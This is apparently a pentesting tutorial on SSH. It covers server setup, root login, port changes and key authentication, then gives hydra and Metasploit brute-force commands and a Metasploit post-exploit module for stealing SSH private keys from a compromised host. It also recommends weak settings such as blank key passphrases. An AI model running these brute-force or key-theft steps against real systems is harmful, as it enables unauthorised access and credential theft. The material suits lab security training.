What is SSH
Secure Shell or SSH is used to remotely access the server or any computer with SSH enabled. Perfect replacement for telnet protocol. Telnet is not secure like SSH, SSH provides encryption for secure communication. SSH by default uses TCP port 22 to connect with the SSH service. SSH will allow the client to connect to the remote system through the command line. We will look at how to configure and do pentesting on SSH.
Installing and configuring SSH Server
It’s very easy to install SSH in any system like Kali, Ubuntu or any other Linux system. I am using a Ubuntu system to install the ssh server.
apt-get install openssh-server
With the help of the above command, you can install the ssh service in your system. Once your installation is finished type
service ssh start
and you can start the ssh service to confirm we will scan our IP address with Nmap for port 22
nmap -p 22 localhost -sV
Nmap will scan if port 22 is open or not and if yes then what service is running on that port. Once you confirm that SSH is running we can see what we can do to secure it which we should do during protesting. Let’s try to connect with our ubuntu server from a different system, Here my Ubuntu system IP address is 192.168.75.130
Here I am using a windows system to connect with our ubuntu. Windows has an SSH client installed so we can use it with Powershell or CMD.
Type the above command in your PowerShell/CMD and then enter your password root password. you will get permission denied error, It’s important to understand why. SSH by default won’t allow you to connect with the server as a root user, You can connect with it with any other user except root. Here on my ubuntu machine, I have another user allabouthack.
again it will ask for the password of the allabouthack users and after the right credentials, I will be connected with the ubuntu system. Now I can do anything from my windows machine to the Ubuntu machine with the terminal of the ubuntu system.
SSH ROOT USER
Now as I said by default you can’t access the root user through SSH. To access the root user we have to do some configuration. We need to edit the ssh_config file from our ubuntu server.
From this file find
PermitRootLogin without-password and replace it with
PermitRootLogin yes then restart your SSH service with
sudo service ssh restart and try again to connect to the root user with SSH, This time you can connect with the root user.
Changing the Default Port
Many times organizations change the default port number for services. Which doesn’t make any sense except to waste the time of the attacker. If an attacker wants to target the SSH service he will scan for Port 22 and if SSH is running on a different port then the attacker will think SSH is not running or has to scan more to find which port is running SSH.
Open the same config file and find
Port 22 and change it to any port you want I am changing it to
1234 then restart the SSH service
Sudo service ssh restart. To confirm that port is changed we can scan for port
Or we can try to connect with ssh on port 22 and we will get an error. When you run SSH on a different port you can’t use the above command to connect with it you have to specify the port
ssh [email protected] -p 1234
SSH RSA KEY
SSH allows us to connect with the server without a password with the help of RSA public and private keys. It’s useful for security reasons. We can block the password-based authentication and authenticate with an RSA key only, in this situation if the password is leaked or weak for directory attack still attacker can’t connect with it.
We need to create an RSA key pair of the public and private keys. The public key will be saved on the server and the private key inside the client machine. There are multiple ways and tools available to do this. First, we need to create the keys from our ubuntu server.
$ ssh-keygen $ cd /root/.ssh $ cp id_rsa.pub /root/.ssh/authorized_keys $ ls
First, we will create the key with
ssh-keygen, It will ask for the password for extra layer protection. Keep it blank, Now we will go to the ssh directory. And will copy the key into a different file with the cp command. now type ls and confirm it.
Now we need to transfer the
id_rsa file into the client machine which is windows. You can use any method like drive, local server etc to transfer it. Now you have to move that file to your user location inside
Now you can try to connect with the SSH server, and it won’t ask for the password. But It will still take the password so we have to block it so SSH will only accept the RSA key and will reject the password. We need to configure the ssh file
Now change the
PasswordAuthentication yes with
We can perform brute-force with hydra and Metasploit. I will show you how you can perform brute force with both. Let’s take a look at how to perform it with hydra.
hydra -l root -P password.txt 192.168.75.130 ssh -t 5
First, we are using -l for the username, you can use -L if you have a list of usernames. Then we are using -P for password list location folwed by IP address service and the number of threads.
use auxiliary/scanner/ssh/ssh_login set RHOSTS 192.168.75.130 set USERPASS_FILE /home/pentesting/password.txt set VERBOSE True set USERNAME root run
With the above options, you can perform brute-force with Metasploit, Again we are using a single username if you have multiple usernames in a file then use
USERPASS_FILE /home/password.txt. Obviously, you have to change the location of the wordlist.
There are lots of different things you can do while penetrating a server with SSH enabled like password attack as we have seen, Metasploit session with an SSH key, and Stealing SSH keys.
Stealing SSH Keys
This attack requires a compromised server with SSH server running. If you are able to compromise a server with Metasploit and the server has SSH running but requires a key to connect with it. in that situation, you can steal the keys from the compromised server.
use post/multi/gather/ssh_creds set session 4 exploit
Once you have compromised the server with Metasploit then run it in the background and run the above post exploit within your Metasploit and set your exploited server session id.
Once you find that you can get the key for that you have to start the session and download the key.
session 4 cd /home/username/.ssh download id_rsa /home/
Once the key is downloaded you can find it in
/home the directory. If you have the key then you can use it to connect with it as we saw earlier. There are lots of other things you can do with SSH you can check Metasploit
use auxiliary/scanner/ssh to list all the options available.